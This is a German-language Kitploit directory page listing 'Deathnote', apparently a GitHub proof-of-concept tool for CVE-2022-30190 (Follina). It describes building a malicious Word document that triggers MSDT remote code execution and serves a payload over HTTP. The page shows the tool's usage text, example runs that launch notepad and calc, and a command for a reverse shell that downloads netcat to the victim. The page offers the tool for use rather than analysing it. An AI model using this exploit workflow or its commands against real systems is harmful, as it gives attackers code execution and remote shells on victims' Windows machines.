Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Deathnote — Proof of Concept für CVE-2022-30190 | Kitploit
Tools/GitHubGitHub/malwareman007/deathnote
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubmalwareman007/deathnote

Deathnote

Proof of Concept für CVE-2022-30190

Repository anzeigen
3869vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Deathnote

Proof of Concept zu CVE-2022-30190

Eine Remotecodeausführungs-Schwachstelle liegt vor, wenn MSDT über das URL-Protokoll von einer aufrufenden Anwendung wie Word aufgerufen wird. Ein Angreifer, der diese Schwachstelle erfolgreich ausnutzt, kann beliebigen Code mit den Rechten der aufrufenden Anwendung ausführen. Der Angreifer kann dann Programme installieren, Daten anzeigen, ändern oder löschen oder neue Konten im Rahmen der Benutzerrechte erstellen.


Erstellen Sie einen „Deathnote“-MS-MSDT-Angriff mit einem bösartigen Microsoft Word-Dokument und stellen Sie eine Payload über einen HTTP-Server bereit.

Verwendung

usage: follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

options:
  -h, --help            show this help message and exit
  --command COMMAND, -c COMMAND
                        command to run on the target (default: Notepad)
  --output OUTPUT, -o OUTPUT
                        output maldoc file (default: ./Deathnote.doc)
  --interface INTERFACE, -i INTERFACE
                        network interface or IP address to host the HTTP server (default: eth0)
  --port PORT, -p PORT  port to serve the HTTP server (default: 8000)

Beispiele

notepad.exe starten:

$ python3 Deathnote.py   
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./Deathnote.doc
[+] serving html payload on :8000

calc.exe starten:

$ python3 Deathnote.py -c "calc"

demo

Erhalten Sie eine Reverse Shell auf Port 4444. Hinweis: Dabei wird eine Netcat-Binärdatei auf das Opfer heruntergeladen und in C:\Windows\Tasks abgelegt. Die Binärdatei wird nicht aufgeräumt. Dies wird Antiviren-Erkennungen auslösen, sofern die Antivirensoftware nicht deaktiviert ist.

Holen Sie sich reverse shell :

python3 Deathnote.py -p 1234
Tool herunterladen